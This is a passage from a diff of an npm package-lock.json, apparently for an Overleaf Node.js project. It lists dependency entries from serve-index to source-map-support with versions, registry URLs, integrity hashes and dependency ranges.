"node_modules/serve-index/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==", + "dev": true, + "license": "MIT" + }, + "node_modules/serve-index/node_modules/setprototypeof": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.1.0.tgz", + "integrity": "sha512-BvE/TwpZX4FXExxOxZyRGQQv651MSwmWKZGqvmPcRIjDqWub67kTKuIMx43cZZrS/cBBzwBcNDWoFxt2XEFIpQ==", + "dev": true, + "license": "ISC" + }, + "node_modules/serve-static": { + "version": "1.16.2", + "resolved": "https://registry.npmjs.org/serve-static/-/serve-static-1.16.2.tgz", + "integrity": "sha512-VqpjJZKadQB/PEbEwvFdO43Ax5dFBZ2UECszz8bQ7pi7wt//PWe1P6MN7eCnjsatYtBT6EuiClbjSWP2WrIoTw==", + "dependencies": { + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "parseurl": "~1.3.3", + "send": "0.19.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/serve-static/node_modules/encodeurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz", + "integrity": "sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/set-blocking": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", + "integrity": "sha1-BF+XgtARrppoA93TgrJDkrPYkPc=" + }, + "node_modules/set-cookie-parser": { + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/set-cookie-parser/-/set-cookie-parser-2.6.0.tgz", + "integrity": "sha512-RVnVQxTXuerk653XfuliOxBP81Sf0+qfQE73LIYKcyMYHG94AuH0kgrQpRDuTZnSmjpysHmzxJXKNfa6PjFhyQ==", + "dev": true + }, + "node_modules/set-function-length": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/set-function-length/-/set-function-length-1.2.2.tgz", + "integrity": "sha512-pgRc4hJ4/sNjWCSS9AmnS40x3bNMDTknHgL5UaMBTMyJnU90EgWh1Rz+MC9eFu4BuN/UwZjKQuY/1v3rM7HMfg==", + "dependencies": { + "define-data-property": "^1.1.4", + "es-errors": "^1.3.0", + "function-bind": "^1.1.2", + "get-intrinsic": "^1.2.4", + "gopd": "^1.0.1", + "has-property-descriptors": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/set-function-name": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/set-function-name/-/set-function-name-2.0.1.tgz", + "integrity": "sha512-tMNCiqYVkXIZgc2Hnoy2IvC/f8ezc5koaRFkCjrpWzGpCd3qbZXPzVy9MAZzK1ch/X0jvSkojys3oqJN0qCmdA==", + "dependencies": { + "define-data-property": "^1.0.1", + "functions-have-names": "^1.2.3", + "has-property-descriptors": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/set-value": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/set-value/-/set-value-2.0.1.tgz", + "integrity": "sha512-JxHc1weCN68wRY0fhCoXpyK55m/XPHafOmK4UWD7m2CI14GMcFypt4w/0+NV5f/ZMby2F6S2wwA7fgynh9gWSw==", + "dev": true, + "dependencies": { + "extend-shallow": "^2.0.1", + "is-extendable": "^0.1.1", + "is-plain-object": "^2.0.3", + "split-string": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/set-value/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/set-value/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/setprototypeof": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz", + "integrity": "sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==" + }, + "node_modules/sha.js": { + "version": "2.4.11", + "resolved": "https://registry.npmjs.org/sha.js/-/sha.js-2.4.11.tgz", + "integrity": "sha512-QMEp5B7cftE7APOjk5Y6xgrbWu+WkLVQwk8JNjZ8nKRciZaByEW6MubieAiToS7+dwvrjGhH8jRXz3MVd0AYqQ==", + "dev": true, + "license": "(MIT AND BSD-3-Clause)", + "dependencies": { + "inherits": "^2.0.1", + "safe-buffer": "^5.0.1" + }, + "bin": { + "sha.js": "bin.js" + } + }, + "node_modules/shallow-clone": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/shallow-clone/-/shallow-clone-3.0.1.tgz", + "integrity": "sha512-/6KqX+GVUdqPuPPd2LxDDxzX6CAbjJehAAOKlNpqqUpAqPM6HeL8f+o3a+JsyGjn2lv0WY8UsTgUJjU9Ok55NA==", + "dev": true, + "dependencies": { + "kind-of": "^6.0.2" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/shallow-equal": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/shallow-equal/-/shallow-equal-3.1.0.tgz", + "integrity": "sha512-pfVOw8QZIXpMbhBWvzBISicvToTiM5WBF1EeAUZDDSb5Dt29yl4AYbyywbJFSEsRUMr7gJaxqCdr4L3tQf9wVg==" + }, + "node_modules/shebang-command": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", + "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dependencies": { + "shebang-regex": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/shebang-regex": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", + "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "engines": { + "node": ">=8" + } + }, + "node_modules/shell-quote": { + "version": "1.8.2", + "resolved": "https://registry.npmjs.org/shell-quote/-/shell-quote-1.8.2.tgz", + "integrity": "sha512-AzqKpGKjrj7EM6rKVQEPpB288oCfnrEIuyoT9cyF4nmGa7V8Zk6f7RRqYisX8X9m+Q7bd632aZW4ky7EhbQztA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/shimmer": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/shimmer/-/shimmer-1.2.1.tgz", + "integrity": "sha512-sQTKC1Re/rM6XyFM6fIAGHRPVGvyXfgzIDvzoq608vM+jeyVD0Tu1E6Np0Kc2zAIFWIj963V2800iF/9LPieQw==" + }, + "node_modules/side-channel": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/side-channel/-/side-channel-1.0.6.tgz", + "integrity": "sha512-fDW/EZ6Q9RiO8eFG8Hj+7u/oW+XrPTIChwCOM2+th2A6OblDtYYIpve9m+KvI9Z4C9qSEXlaGR6bTEYHReuglA==", + "dependencies": { + "call-bind": "^1.0.7", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.4", + "object-inspect": "^1.13.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/sift": { + "version": "17.1.3", + "resolved": "https://registry.npmjs.org/sift/-/sift-17.1.3.tgz", + "integrity": "sha512-Rtlj66/b0ICeFzYTuNvX/EF1igRbbnGSvEyT79McoZa/DeGhMyC5pWKOEsZKnpkqtSeovd5FL/bjHWC3CIIvCQ==", + "license": "MIT" + }, + "node_modules/sigmund": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/sigmund/-/sigmund-1.0.1.tgz", + "integrity": "sha512-fCvEXfh6NWpm+YSuY2bpXb/VIihqWA6hLsgboC+0nl71Q7N7o2eaCW8mJa/NLvQhs6jpd3VZV4UiUQlV6+lc8g==", + "dev": true + }, + "node_modules/signal-exit": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==" + }, + "node_modules/simple-concat": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/simple-concat/-/simple-concat-1.0.1.tgz", + "integrity": "sha512-cSFtAPtRhljv69IK0hTVZQ+OfE9nePi/rtJmw5UjHeVyVroEqJXP1sFztKUy1qU+xvz3u/sfYJLa947b7nAN2Q==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/simple-get": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/simple-get/-/simple-get-3.1.1.tgz", + "integrity": "sha512-CQ5LTKGfCpvE1K0n2us+kuMPbk/q0EKl82s4aheV9oXjFEz6W/Y7oQFVJuU6QG77hRT4Ghb5RURteF5vnWjupA==", + "dev": true, + "optional": true, + "peer": true, + "dependencies": { + "decompress-response": "^4.2.0", + "once": "^1.3.1", + "simple-concat": "^1.0.0" + } + }, + "node_modules/simple-get/node_modules/decompress-response": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-4.2.1.tgz", + "integrity": "sha512-jOSne2qbyE+/r8G1VU+G/82LBs2Fs4LAsTiLSHOCOMZQl2OKZ6i8i4IyHemTe+/yIXOtTcRQMzPcgyhoFlqPkw==", + "dev": true, + "optional": true, + "peer": true, + "dependencies": { + "mimic-response": "^2.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/simple-get/node_modules/mimic-response": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-2.1.0.tgz", + "integrity": "sha512-wXqjST+SLt7R009ySCglWBCFpjUygmCIfD790/kVbiGmUgfYGuB14PiTd5DwVxSV4NcYHjzMkoj5LjQZwTQLEA==", + "dev": true, + "optional": true, + "peer": true, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/simple-oauth2": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/simple-oauth2/-/simple-oauth2-5.0.0.tgz", + "integrity": "sha512-8291lo/z5ZdpmiOFzOs1kF3cxn22bMj5FFH+DNUppLJrpoIlM1QnFiE7KpshHu3J3i21TVcx4yW+gXYjdCKDLQ==", + "dependencies": { + "@hapi/hoek": "^10.0.1", + "@hapi/wreck": "^18.0.0", + "debug": "^4.3.4", + "joi": "^17.6.4" + } + }, + "node_modules/simple-oauth2/node_modules/@hapi/hoek": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/@hapi/hoek/-/hoek-10.0.1.tgz", + "integrity": "sha512-CvlW7jmOhWzuqOqiJQ3rQVLMcREh0eel4IBnxDx2FAcK8g7qoJRQK4L1CPBASoCY6y8e6zuCy3f2g+HWdkzcMw==" + }, + "node_modules/simple-oauth2/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/simple-oauth2/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/simple-update-notifier": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/simple-update-notifier/-/simple-update-notifier-2.0.0.tgz", + "integrity": "sha512-a2B9Y0KlNXl9u/vsW6sTIu9vGEpfKu2wRV6l1H3XEas/0gUIzGzBoP/IouTcUQbm9JWZLH3COxyn03TYlFax6w==", + "dev": true, + "dependencies": { + "semver": "^7.5.3" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/simple-update-notifier/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/simple-update-notifier/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/simple-update-notifier/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/sinon": { + "version": "9.2.4", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.2.4.tgz", + "integrity": "sha512-zljcULZQsJxVra28qIAL6ow1Z9tpattkCTEJR4RBP3TGc00FcttsP5pK284Nas5WjMZU5Yzy3kAIp3B3KRf5Yg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.8.1", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/samsam": "^5.3.1", + "diff": "^4.0.2", + "nise": "^4.0.4", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "node_modules/sinon-chai": { + "version": "3.7.0", + "resolved": "https://registry.npmjs.org/sinon-chai/-/sinon-chai-3.7.0.tgz", + "integrity": "sha512-mf5NURdUaSdnatJx3uhoBOrY9dtL19fiOtAdT1Azxg3+lNJFiuN0uzaU3xX1LeAfL17kHQhTAJgpsfhbMJMY2g==", + "dev": true, + "peerDependencies": { + "chai": "^4.0.0", + "sinon": ">=4.0.0" + } + }, + "node_modules/sinon-stub-promise": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/sinon-stub-promise/-/sinon-stub-promise-4.0.0.tgz", + "integrity": "sha1-bUmLoRmFV80B40Zq+S3H33JRksI=", + "dev": true, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/sinon/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "node_modules/sinon/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/sisteransi": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", + "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", + "dev": true, + "license": "MIT" + }, + "node_modules/slash": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-2.0.0.tgz", + "integrity": "sha512-ZYKh3Wh2z1PpEXWr0MpSBZ0V6mZHAQfYevttO11c51CaWjGTaadiKZ+wVt1PbMlDV5qhMFslpZCemhwOK7C89A==", + "engines": { + "node": ">=6" + } + }, + "node_modules/slice-ansi": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-4.0.0.tgz", + "integrity": "sha512-qMCMfhY040cVHT43K9BFygqYbUPFZKHOg7K73mtTWJRb8pyP3fzf4Ixd5SzdEJQ6MRUg/WBnOLxghZtKKurENQ==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.0.0", + "astral-regex": "^2.0.0", + "is-fullwidth-code-point": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/slice-ansi?sponsor=1" + } + }, + "node_modules/slice-ansi/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/slugify": { + "version": "1.6.5", + "resolved": "https://registry.npmjs.org/slugify/-/slugify-1.6.5.tgz", + "integrity": "sha512-8mo9bslnBO3tr5PEVFzMPIWwWnipGS0xVbYf65zxDqfNwmzYn1LpiKNrR6DlClusuvo+hDHd1zKpmfAe83NQSQ==", + "dev": true, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "optional": true, + "peer": true, + "engines": { + "node": ">= 6.0.0", + "npm": ">= 3.0.0" + } + }, + "node_modules/snapdragon": { + "version": "0.8.2", + "resolved": "https://registry.npmjs.org/snapdragon/-/snapdragon-0.8.2.tgz", + "integrity": "sha512-FtyOnWN/wCHTVXOMwvSv26d+ko5vWlIDD6zoUJ7LW8vh+ZBC8QdljveRP+crNrtBwioEUWy/4dMtbBjA4ioNlg==", + "dev": true, + "dependencies": { + "base": "^0.11.1", + "debug": "^2.2.0", + "define-property": "^0.2.5", + "extend-shallow": "^2.0.1", + "map-cache": "^0.2.2", + "source-map": "^0.5.6", + "source-map-resolve": "^0.5.0", + "use": "^3.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon-node": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/snapdragon-node/-/snapdragon-node-2.1.1.tgz", + "integrity": "sha512-O27l4xaMYt/RSQ5TR3vpWCAB5Kb/czIcqUFOM/C4fYcLnbZUc1PkjTAMjof2pBWaSTwOUd6qUHcFGVGj7aIwnw==", + "dev": true, + "dependencies": { + "define-property": "^1.0.0", + "isobject": "^3.0.0", + "snapdragon-util": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon-node/node_modules/define-property": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-1.0.0.tgz", + "integrity": "sha512-cZTYKFWspt9jZsMscWo8sc/5lbPC9Q0N5nBLgb+Yd915iL3udB1uFgS3B8YCx66UVHq018DAVFoee7x+gxggeA==", + "dev": true, + "dependencies": { + "is-descriptor": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon-util": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/snapdragon-util/-/snapdragon-util-3.0.1.tgz", + "integrity": "sha512-mbKkMdQKsjX4BAL4bRYTj21edOf8cN7XHdYUJEe+Zn99hVEYcMvKPct1IqNe7+AZPirn8BCDOQBHQZknqmKlZQ==", + "dev": true, + "dependencies": { + "kind-of": "^3.2.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon-util/node_modules/kind-of": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-3.2.2.tgz", + "integrity": "sha512-NOW9QQXMoZGg/oqnVNoNTTIFEIid1627WCffUBJEdMxYApq7mNE7CpzucIPc+ZQg25Phej7IJSmX3hO+oblOtQ==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/snapdragon/node_modules/define-property": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-0.2.5.tgz", + "integrity": "sha512-Rr7ADjQZenceVOAKop6ALkkRAmH1A4Gx9hV/7ZujPUN2rkATqFO0JZLZInbAjpZYoJ1gUx8MRMQVkYemcbMSTA==", + "dev": true, + "dependencies": { + "is-descriptor": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon/node_modules/is-descriptor": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-0.1.7.tgz", + "integrity": "sha512-C3grZTvObeN1xud4cRWl366OMXZTj0+HGyk4hvfpx4ZHt1Pb60ANSXqCK7pdOTeUQpRzECBSTphqvD7U+l22Eg==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/snapdragon/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==", + "dev": true + }, + "node_modules/snapdragon/node_modules/source-map": { + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", + "integrity": "sha512-LbrmJOMUSdEVxIKvdcJzQC+nQhe8FUZQTXQy6+I75skNgn3OoQ0DZA8YnFa7gp8tqtL3KPf1kmo0R5DoApeSGQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/socket.io": { + "version": "0.9.19-overleaf-11", + "resolved": "git+ssh://git@github.com/overleaf/socket.io.git#5afa587036620afa232d0f7b778ebb1541d7e4d5", + "dependencies": { + "base64id": "0.1.0", + "policyfile": "0.0.4" + }, + "engines": { + "node": ">= 0.4.0" + }, + "optionalDependencies": { + "redis": "0.7.3" + } + }, + "node_modules/socket.io-client": { + "version": "0.9.17-overleaf-5", + "resolved": "git+ssh://git@github.com/overleaf/socket.io-client.git#805a73d2a2e2408982597d5986a401088b7aa588", + "dependencies": { + "ws": "^1.1.5", + "xmlhttprequest": "^1.8.0" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/socket.io-client/node_modules/ws": { + "version": "1.1.5", + "resolved": "https://registry.npmjs.org/ws/-/ws-1.1.5.tgz", + "integrity": "sha512-o3KqipXNUdS7wpQzBHSe180lBGO60SoK0yVo3CYJgb2MkobuWuBX6dhkYP5ORCLd55y+SaflMOV5fqAB53ux4w==", + "dependencies": { + "options": ">=0.0.5", + "ultron": "1.0.x" + } + }, + "node_modules/sockjs": { + "version": "0.3.24", + "resolved": "https://registry.npmjs.org/sockjs/-/sockjs-0.3.24.tgz", + "integrity": "sha512-GJgLTZ7vYb/JtPSSZ10hsOYIvEYsjbNU+zPdIHcUaWVNUEPivzxku31865sSSud0Da0W4lEeOPlmw93zLQchuQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "faye-websocket": "^0.11.3", + "uuid": "^8.3.2", + "websocket-driver": "^0.7.4" + } + }, + "node_modules/sockjs/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "dev": true, + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/socks": { + "version": "2.8.3", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.3.tgz", + "integrity": "sha512-l5x7VUUWbjVFbafGLxPWkYsHIhEvmF85tbIeFZWc8ZPtoMyybuEhL7Jye/ooC4/d48FgOjSJXgsF/AJPYCW8Zw==", + "optional": true, + "peer": true, + "dependencies": { + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" + }, + "engines": { + "node": ">= 10.0.0", + "npm": ">= 3.0.0" + } + }, + "node_modules/sortobject": { + "version": "4.16.0", + "resolved": "https://registry.npmjs.org/sortobject/-/sortobject-4.16.0.tgz", + "integrity": "sha512-jdcWhqJjxyYxRcXa30qImF3PZea1GpNwdKxUac28T28+GodptH4XihPuRlgCY0hITIEQVnw8DtQ81Fb6fomBaw==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://bevry.me/fund" + } + }, + "node_modules/source-list-map": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/source-list-map/-/source-list-map-2.0.1.tgz", + "integrity": "sha512-qnQ7gVMxGNxsiL4lEuJwe/To8UnK7fAnmbGEEH8RpLouuKbeEm0lhbQVFIrNSuB+G7tVrAlVsZgETT5nljf+Iw==", + "dev": true + }, + "node_modules/source-map": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", + "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/source-map-js": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.0.tgz", + "integrity": "sha512-itJW8lvSA0TXEphiRoawsCksnlf8SyvmFzIhltqAHluXd88pkCd+cXJVHTDwdCr0IzwptSm035IHQktUu1QUMg==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/source-map-resolve": { + "version": "0.5.3", + "resolved": "https://registry.npmjs.org/source-map-resolve/-/source-map-resolve-0.5.3.tgz", + "integrity": "sha512-Htz+RnsXWk5+P2slx5Jh3Q66vhQj1Cllm0zvnaY98+NFx+Dv2CF/f5O/t8x+KaNdrdIAsruNzoh/KpialbqAnw==", + "deprecated": "See https://github.com/lydell/source-map-resolve#deprecated", + "dev": true, + "dependencies": { + "atob": "^2.1.2", + "decode-uri-component": "^0.2.0", + "resolve-url": "^0.2.1", + "source-map-url": "^0.4.0", + "urix": "^0.1.0" + } + }, + "node_modules/source-map-support": { + "version": "0.5.21", + "resolved": 